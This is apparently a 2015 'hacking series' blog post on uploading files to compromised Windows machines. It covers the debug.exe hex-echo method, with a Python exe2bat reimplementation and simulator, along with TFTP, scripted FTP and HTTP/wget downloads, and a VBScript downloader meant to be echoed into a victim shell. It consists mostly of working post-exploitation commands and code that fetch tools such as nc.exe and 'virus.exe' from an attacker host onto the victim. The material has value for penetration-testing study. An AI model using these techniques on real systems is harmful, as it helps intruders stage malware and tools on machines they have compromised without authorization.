Uploading files to compromised systems

Written by  on October 21, 2015 

The windows debug method

Windows ships a 16-bit program called debug.exe that can, among other things, take bytes typed in as hex and write them out as a file. The debug method of transferring files to a compromised box consists of converting the file to hex on the attacker side, echoing those hex lines through the non-interactive shell into a text file on the victim, and finally feeding that text file to debug, which turns it back into the original binary. Two caveats: debug.exe is a 16-bit DOS program, so it only exists on 32-bit editions of Windows, and it can only write a file of at most 64 KB (the byte count is held in the 16-bit CX register), which is fine for nc.exe but rules out larger tools. Kali ships a converter for this called exe2bat in /usr/share/windows-binaries.

We can run that with:

root@kali:/usr/share/windows-binaries# wine exe2bat.exe nc.exe nc2.txt

Finished: nc.exe > nc2.txt
root@kali:/usr/share/windows-binaries#

That command generates a text file whose content looks like the following (the long echo lines are truncated here; each one carries 128 bytes of hex):

echo 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 a3 00 47 65 74 43 50 49 6e 66 6f 00 9d 00 47 65 74 41 43 50 00 00 09 01 47 65 74 4f 45 4d 43 50 00 00 1e 00 43 6f 6d 70 61 72 65 53 74 72 69 6e 6$
echo e e780 >>123.hex
echo 6c 65 00 00 19 02 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 00 00 2b 01 47 65 74 53 74 72 69 6e 67 54 79 70 65 41 00 00 2e 01 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 16 01 47 65 74 50 72 6f 63 41 6$
echo e e800 >>123.hex
echo 47 65 74 4e 75 6d 62 65 72 4f 66 43 6f 6e 73 6f 6c 65 49 6e 70 75 74 45 76 65 6e 74 73 00 31 00 43 72 65 61 74 65 46 69 6c 65 41 00 10 02 53 65 74 45 6e 64 4f 66 46 69 6c 65 00 00 8d 01 4c 43 4d 61 70 53 7$
echo e e880 >>123.hex
echo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0$
echo e e900 >>123.hex
echo  >>123.hex
echo r cx >>123.hex
echo e800 >>123.hex
echo w >>123.hex
echo q >>123.hex
debug<123.hex
copy 1.dll nc.exe

After doing this, all we have to do is copy the whole content of the text file and paste it into the shell window. Note that debug refuses to write files with an .exe (or .hex) extension, which is why exe2bat makes it write 1.dll and then copies the result to nc.exe.

0C96:E8E0  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8E8  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8F0  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E8F8  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.00
0C96:E900  EC.     0E.     AC.
-e e900
0C96:E900  EC.
EC   0E.e    AC.ac
-r cx
CX 0000
:e800
-w
Writing 0E800 bytes
-q

C:\TRANSF~1>

And our file appears in the remote directory, with the same size as the original:

21/10/2015  22:44    <DIR>          .
21/10/2015  22:44    <DIR>          ..
21/10/2015  22:44            59.392 1.DLL
21/10/2015  22:44           184.270 123.hex
21/10/2015  22:44            59.392 nc.exe
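As an added example (my own code, not part of the original post and not the exe2bat tool itself), here is a small Python script that does what exe2bat does, so you can generate the batch text yourself and, more importantly, check that the bytes debug would write match the file that went in before pasting anything into a fragile shell. It enforces the two constraints that make the method fail in practice: the 64 KB segment limit, and debug's refusal to write files named *.exe or *.hex. It also models the handful of debug commands the script uses (n, e, r cx, w, q) so the round trip can be tested offline. The output file name 1.dll, the script name 123.hex and the sample payload are assumptions; the one difference from exe2bat's output is that each e line carries its bytes on the same line (debug's documented "E address list" form) instead of on the line after it.

```python
# Added example: a Python re-implementation of what exe2bat does, plus a model
# of the debug.exe commands it relies on, so the round trip can be checked
# before anything is pasted into the remote shell. Not the original tool;
# file names and the sample payload are assumptions.

DEBUG_ORG = 0x100                      # debug loads and writes file data from CS:0100
DEBUG_SEG_END = 0x10000                # debug addresses a single 16-bit segment
MAX_FILE = DEBUG_SEG_END - DEBUG_ORG   # 0xFF00 = 65280 bytes: the hard size limit
CHUNK = 128                            # bytes per 'e' line (exe2bat also steps by 0x80)


def debug_script(data: bytes, out_name: str = "1.dll") -> str:
    """Build the text fed to `debug < script`: n, e..., r cx, w, q.

    debug refuses to write files named *.exe or *.hex, which is why exe2bat
    writes 1.dll and the shell then copies it to nc.exe.
    """
    if len(data) > MAX_FILE:
        raise ValueError(f"{len(data)} bytes: debug can only write up to "
                         f"{MAX_FILE} bytes, use tftp/ftp/http for this file")
    if out_name.lower().endswith((".exe", ".hex")):
        raise ValueError("debug cannot write .exe/.hex files; pick another name")
    lines = [f"n {out_name}"]
    for off in range(0, len(data), CHUNK):
        chunk = data[off:off + CHUNK]
        lines.append(f"e {DEBUG_ORG + off:04x} " + " ".join(f"{b:02x}" for b in chunk))
    # 'r cx' prints the current value and reads the new one from the next line;
    # 'w' then writes BX:CX bytes starting at CS:0100 to the file named with 'n'.
    lines += ["r cx", f"{len(data):04x}", "w", "q"]
    return "\n".join(lines) + "\n"


def to_batch(script: str, script_name: str = "123.hex", final_name: str = "") -> str:
    """Wrap every debug line in an echo so the whole thing can be pasted into cmd."""
    out = []
    for i, line in enumerate(script.splitlines()):
        # keep a space before the redirect: a digit glued to '>' is a file handle in cmd
        out.append(f"echo {line} {'>' if i == 0 else '>>'}{script_name}")
    out.append(f"debug<{script_name}")
    if final_name:                      # e.g. copy 1.dll nc.exe, as on the page
        out.append(f"copy {script.split(maxsplit=2)[1]} {final_name}")
    return "\n".join(out) + "\n"


def simulate_debug(script: str) -> tuple:
    """Model the five debug commands the script uses; return (file name, bytes written)."""
    mem = bytearray(DEBUG_SEG_END)
    name, cx = "", 0
    lines = iter(script.splitlines())
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        cmd = parts[0].lower()
        if cmd == "n":
            name = parts[1]
        elif cmd == "e":                            # E address list
            addr = int(parts[1], 16)
            for i, h in enumerate(parts[2:]):
                mem[addr + i] = int(h, 16)
        elif cmd == "r" and parts[1].lower() == "cx":
            cx = int(next(lines), 16)               # the value typed at the ':' prompt
        elif cmd == "w":
            return name, bytes(mem[DEBUG_ORG:DEBUG_ORG + cx])
        elif cmd == "q":
            break
    raise RuntimeError("script ended without writing a file")


if __name__ == "__main__":
    # usage: python3 exe2bat.py nc.exe nc.exe > nc2.txt
    import sys
    payload = open(sys.argv[1], "rb").read()
    assert simulate_debug(debug_script(payload))[1] == payload
    sys.stdout.write(to_batch(debug_script(payload), final_name=sys.argv[2]))
```

The simulated round trip is the check worth keeping: if a file is too large, or the output name ends in .exe, the script fails on the attacker side instead of leaving you with a silently truncated or missing file on the victim.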

The TFTP method

TFTP is a minimal file transfer protocol that runs over UDP, and the Windows tftp client needs only a single command line, so it is handy for pulling files from the attacker box onto a compromised host from a non-interactive shell. Keep in mind that it is a lock-step protocol: every 512-byte block has to be acknowledged before the next one is sent, so transfers are slow, and a large file over a lossy link can stall or time out. Also note that the tftp client is present by default on Windows XP and Server 2003 but is an optional feature from Windows Vista onwards, so check that tftp.exe exists before relying on it.

You can install tftpy, a simple Python TFTP server, with:

# apt-get install git && git clone git://github.com/msoulier/tftpy.git

Then create a folder that will host your files and make it world-readable (chmod 755 is enough to serve downloads; 777 is not needed). After that, install the server:

# cd tftpy

# python setup.py install

After installing the server you can run it, pointing -r at the folder you created:

# cd bin

# python tftpy_server.py -r /yourfolder

And on the victim box run the following to fetch the file. The -i switch selects binary (octet) mode, which is required for executables; without it the client transfers in netascii mode and corrupts the binary:

C:\TRANSF~1>tftp -i 192.168.11.70 get nc.exe
tftp -i 192.168.11.70 get nc.exe

C:\TRANSF~1>
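To make the caveats above concrete, here is an added example (my own code, not from the original post and not tftpy) of the server side of the exchange that tftp -i <host> get nc.exe triggers, written as a pure state machine plus a thin UDP wrapper. It shows why the transfer is lock-step and slow (one 512-byte DATA packet per ACK), why -i matters (requests that are not in octet mode are refused), and how a lost or duplicated ACK is handled (the server resends the block it is on instead of advancing). The file names and in-memory file contents used with it are constructed for the example.

```python
# Added example, not from the original post and not tftpy: the server side of
# the read request that `tftp -i <host> get nc.exe` sends, as a pure state
# machine (testable offline) plus a thin UDP wrapper. File names and contents
# used with it are constructed for the example.
import socket
import struct
from typing import Optional

RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK_SIZE = 512   # RFC 1350: a DATA packet shorter than this ends the transfer


def rrq_packet(filename: str, mode: str = "octet") -> bytes:
    """What the Windows client sends for `get`; -i selects binary (octet) mode."""
    return struct.pack("!H", RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"

def ack_packet(block: int) -> bytes:
    return struct.pack("!HH", ACK, block & 0xFFFF)

def error_packet(code: int, msg: str) -> bytes:
    return struct.pack("!HH", ERROR, code) + msg.encode() + b"\0"

def parse(pkt: bytes) -> tuple:
    """Decode a packet: (RRQ/WRQ, name, mode) or (DATA/ACK/ERROR, number, payload)."""
    (op,) = struct.unpack("!H", pkt[:2])
    if op in (RRQ, WRQ):
        name, mode, _ = pkt[2:].split(b"\0", 2)
        return op, name.decode(), mode.decode().lower()
    if op in (DATA, ACK, ERROR):
        (num,) = struct.unpack("!H", pkt[2:4])
        return op, num, pkt[4:]
    raise ValueError(f"unknown opcode {op}")


class ReadSession:
    """One file being sent. Lock-step: block n is resent until ACK n arrives."""

    def __init__(self, data: bytes):
        self.data = data
        self.block = 1          # block number of the DATA packet in flight
        self.done = False

    def current(self) -> bytes:
        start = (self.block - 1) * BLOCK_SIZE
        return struct.pack("!HH", DATA, self.block & 0xFFFF) + self.data[start:start + BLOCK_SIZE]

    def on_packet(self, pkt: bytes) -> Optional[bytes]:
        """Feed the client's reply; return the next packet to send, or None when finished."""
        op, num, _ = parse(pkt)
        if op == ERROR:
            self.done = True
            return None
        if op != ACK or num != self.block & 0xFFFF:
            return self.current()          # stale or duplicate ACK: resend, do not advance
        if len(self.current()) - 4 < BLOCK_SIZE:
            self.done = True               # the short final block was acknowledged
            return None
        self.block += 1
        return self.current()


def handle_request(pkt: bytes, files: dict) -> tuple:
    """Answer a request with (session, first DATA packet) or (None, ERROR packet)."""
    op, name, mode = parse(pkt)
    if op != RRQ:
        return None, error_packet(4, "Only read requests are served")
    if mode != "octet":
        return None, error_packet(0, "Binary mode required (use tftp -i)")
    if name not in files:
        return None, error_packet(1, "File not found")
    session = ReadSession(files[name])
    return session, session.current()


def serve(files: dict, port: int = 69, timeout: float = 3.0, max_retries: int = 5) -> None:
    """Serve in-memory files over UDP. Port 69 needs root; the Windows client cannot pick another."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(("0.0.0.0", port))
    while True:
        pkt, client = listener.recvfrom(1024)
        session, reply = handle_request(pkt, files)
        conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # fresh port = server TID (RFC 1350)
        conn.settimeout(timeout)
        conn.sendto(reply, client)
        retries = 0
        while session is not None and not session.done and retries < max_retries:
            try:
                pkt, peer = conn.recvfrom(1024)
            except socket.timeout:
                retries += 1
                conn.sendto(session.current(), client)   # lost DATA or ACK: retransmit
                continue
            if peer != client:
                continue                                  # packet from a different TID: ignore
            retries = 0
            reply = session.on_packet(pkt)
            if reply is not None:
                conn.sendto(reply, client)
        conn.close()
```

Running serve({"nc.exe": open("nc.exe", "rb").read()}) as root serves that one file to the command on the victim shown above; the retry counter is what stops a stalled transfer from hanging the server forever, which is the failure mode you hit when a large file is pushed over UDP on a bad link.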

The FTP method

Another useful method for sending files to a compromised host is an FTP server. FTP runs over TCP, which gives reliable, ordered delivery with retransmission, so it handles larger files without the 64 KB limit of the debug method or the lock-step slowness of TFTP. On Linux we can use an FTP server such as vsftpd:

# apt-get install vsftpd

After installing vsftpd, edit /etc/vsftpd.conf and uncomment local_enable=YES (so a local account can log in) and write_enable=YES (only needed if you also want to upload from the victim back to the server), then restart the service and start sending files.

To fetch a file on the remote box from a non-interactive shell, we write an FTP command script with echo and run the client with -s:, which makes it read its commands from that file instead of stdin. The username and password must be the two lines right after open, because that is what the client's login prompts consume; bin switches to binary mode before the download. We assume the user is ftp and the password is ftp:

C:\WINDOWS\system32>echo open 192.168.11.70 21> ftp.txt
C:\WINDOWS\system32>echo ftp>> ftp.txt
C:\WINDOWS\system32>echo ftp>> ftp.txt
C:\WINDOWS\system32>echo bin >> ftp.txt
C:\WINDOWS\system32>echo GET nc.exe >> ftp.txt
C:\WINDOWS\system32>echo bye >> ftp.txt
C:\WINDOWS\system32>ftp -s:ftp.txt

The file then appears in the shell's current directory.

The HTTP method

As I usually do when working on compromised Unix-like hosts, setting up an HTTP server somewhere on the network and using the wget command is a simple way to transfer files to the remote host. Windows has no native wget, but the /usr/share/windows-binaries folder in Kali Linux contains wget.exe, a Windows build that does the same job. We can transfer wget.exe to the remote host with the debug method (as long as it fits under debug's 64 KB limit) and then use it together with an HTTP server.

For the HTTP server we can use Apache2:

# apt-get install apache2

Then move our files to /var/www/ (on recent Debian-based systems the document root is /var/www/html instead).

And run wget on the Windows box like this:

C:\TRANSF~1>wget.exe http://192.168.11.16/virus.exe
wget.exe http://192.168.11.16/virus.exe
--23:34:27--  http://192.168.11.16/virus.exe
=> `virus.exe'
Connecting to 192.168.11.16:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73,802 [application/x-msdos-program]

0K .......... .......... .......... .......... .......... 69%    4.88 MB/s
50K .......... .......... ..                              100%   21.55 MB/s

23:34:27 (7.04 MB/s) - `virus.exe' saved [73802/73802]

C:\TRANSF~1>

Another way to get wget-like behaviour on Windows is the following VBScript, which can simply be echoed line by line into a file from the non-interactive shell (escape any cmd metacharacters such as <, >, | or & with ^) and then run with cscript, e.g. cscript download.vbs http://192.168.11.16/nc.exe nc.exe. It writes the response through a text stream one byte at a time, which relies on the system ANSI code page mapping every byte value back to itself, so compare the size or hash of the saved file with the original before trusting it:

' Barabas pure vbs downloader - tested on XP sp2
' Microsoft fixed adodbstream but guess what :)
' (c) dec 2004
' First argument  = complete url to download
' Second argument = filename you want to save
' thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/
' v2 - now includes proxy support for the winhttp request stuff

strURL = WScript.Arguments.Item(0)
strFile = WScript.Arguments.Item(1)

' WinHttpRequest proxy settings.
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2

Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts

' Try the available HTTP COM objects in turn. CreateObject raises an error
' when a ProgID is missing, so the fallbacks only work while errors are
' being ignored.
On Error Resume Next
Set http = Nothing
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
On Error GoTo 0
Err.Clear

' comment out next line if no proxy is being used
' and change the proxy to suit ur needs -duh
' (SetProxy only exists on WinHttp.WinHttpRequest, not on the MSXML fallbacks)
http.SetProxy HTTPREQUEST_PROXYSETTING_PROXY, "web-proxy:80"

http.Open "GET", strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing

' Write the response body out one byte at a time through a text stream
' (the FileSystemObject must be created before the stream is opened).
strBuffer = ""
strData = ""
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(strFile, True)
For lngCounter = 0 To UBound(varByteArray)
    ts.Write Chr(255 And AscB(MidB(varByteArray, lngCounter + 1, 1)))
Next
ts.Close

Category : hacking series
